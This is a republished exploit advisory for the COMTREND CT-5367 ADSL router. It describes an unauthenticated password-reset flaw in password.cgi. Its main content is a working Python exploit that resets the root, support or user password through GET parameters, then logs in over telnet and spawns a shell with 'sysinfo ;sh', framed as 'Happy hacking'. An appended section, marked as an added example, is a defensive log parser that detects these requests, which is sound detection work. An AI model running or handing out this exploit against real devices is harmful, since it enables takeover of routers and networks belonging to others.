COMTREND ADSL Router CT-5367 - Remote Code Execution
Source: vfocus.net  Author: TnMch  Published: 2017-12-27
# Exploit Title: Globalnet COMTREND ADSL Router CT-5367 Remote Code Execute
# Date: 11-12-2017
# Exploit Author: TnMch
# Software Link : null
# Type          : HardWare
# Risk of use   : High
# Type to use   : Remote
 
 
1. Description
   
Any user can change the password of every account and execute code remotely, without having access.
   
2. Proof of Concept
 
Request this page before logging in to the ADSL panel: 192.168.1.1/password.cgi/password.cgi
 
<form>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
      <td width="120">Username:</td>
      <td><select name='userName' size="1">
            <option value="0">
            <option value="1">root <!-- admin -->
            <option value="2">support <!-- support -->
            <option value="3">user <!-- user -->
         </select></td>
   </tr>
   <tr>
      <td>Old Password:</td>
      <td><input name='pwdOld' type="password" size="20" maxlength="16"></td>
   </tr>
   <tr>
      <td>New Password:</td>
      <td><input name='pwdNew' type="password" size="20" maxlength="16"></td>
   </tr>
   <tr>
      <td>Confirm Password:</td>
      <td><input name='pwdCfm' type='password' size="20" maxlength="16"></td>
   </tr>
</table>
<br>
<center><input type='button' onClick='btnApply()' value='Save/Apply'></center>
</form>
 
   
3. Exploit
 
 
#!/usr/bin/env python
import platform
import requests
import base64
 
url = "http://192.168.1.1/"
 
''' first check default gateway '''
 
r = requests.get(url,allow_redirects=True)
resp = r.content
 
'''Check resp'''
 
if 'Authorization' not in resp:
    exit("[-]Invalid host !! ")
 
''' Change password '''
 
again = True
 
while again:
    print "Which User"
    print "(root | support | user )"
    user = raw_input('user : ').split()[0]
 
    if user not in ("root","support","user"):
        exit("[-] No user with this name !! ")
 
    print "[+] Update password ",user
    password = raw_input('new password : ').split()[0]
    print "[+] Update new password ['",password,"']"
 
    if user == "root":
       url +="password.cgi?sysPassword="+password
    if user == "support":
       url +="password.cgi?sptPassword="+password
    if user == "user":
       url +="password.cgi?usrPassword="+password
 
    pass_b64 = password.encode('base64').split()[0]
 
    r2 = requests.get(url,allow_redirects=True)
    resp2 = r2.content
 
    ''' Check update '''
 
    if pass_b64 in resp2:
        print "[+] Password for user : ",user," updated!"
        print "Happy hacking :D, enjoy"
    else:
        print "[-] Something Wrong , please check again! "
    
    y_n = raw_input('Do you want again? :D (y/n) : ').split()[0]
    
    if 'n'!= y_n and 'y' != y_n:
        exit('bad input :(')
    if y_n == 'n':
        print "Go Go Go :D ,No Time for you Mr.Robot"
        shell_yn=  raw_input("Do you want shell? (y/n) :D : ").split()[0]
        if shell_yn !='n':
            sys = platform.system()
            if sys =="Windows":
                exit("Sorry only on Linux or Mac Os")
            from pwn import *
            target = "192.168.1.1"
            port = 23
            p = remote(target,port)
            p.recvuntil("Login:")
            p.sendline(user)
            p.recvuntil("Password:")
            p.sendline(password)
            p.sendline("sysinfo ;sh")
            p.interactive()
        again = False
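
For detection, the password-change requests that the script above sends can be found in HTTP logs recorded by a proxy or sensor in front of the router. The following is an added example, not part of the original advisory: the Common Log Format input, the name find_password_resets and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query parameters the PoC sends to password.cgi, mapped to the account they reset.
PASSWORD_PARAMS = {"sysPassword": "root", "sptPassword": "support", "usrPassword": "user"}

# Assumption: logs are in Common Log Format, written by a proxy or sensor near the router.
CLF = re.compile(r'^(?P<src>\S+) \S+ (?P<authuser>\S+) \[[^\]]+\] '
                 r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def find_password_resets(lines):
    """Return one finding per request that sets a password through password.cgi."""
    findings = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # Covers /password.cgi and the doubled /password.cgi/password.cgi path.
        if not parts.path.lower().rstrip("/").endswith("password.cgi"):
            continue
        params = parse_qs(parts.query, keep_blank_values=True)
        for name, account in PASSWORD_PARAMS.items():
            if name in params:
                findings.append({
                    "src": m.group("src"),
                    "account": account,
                    "status": int(m.group("status")),
                    # "-" in the auth-user field: no HTTP credentials were logged.
                    "unauthenticated": m.group("authuser") == "-",
                })
    return findings

# Constructed sample lines (not real traffic); password values are placeholders.
SAMPLE = [
    '192.168.1.23 - - [27/Dec/2017:10:01:02 +0000] "GET /password.cgi/password.cgi HTTP/1.1" 200 1843',
    '192.168.1.23 - - [27/Dec/2017:10:01:09 +0000] "GET /password.cgi?sysPassword=REDACTED HTTP/1.1" 200 1902',
    '192.168.1.10 - root [27/Dec/2017:11:30:00 +0000] "GET /password.cgi?usrPassword=REDACTED HTTP/1.1" 200 1902',
    '192.168.1.10 - root [27/Dec/2017:11:31:00 +0000] "GET /info.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for finding in find_password_resets(SAMPLE):
        print(finding)
```

A finding with "unauthenticated" set to True and a 200 status is the case this advisory describes; the password value itself is deliberately left out of the findings.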
 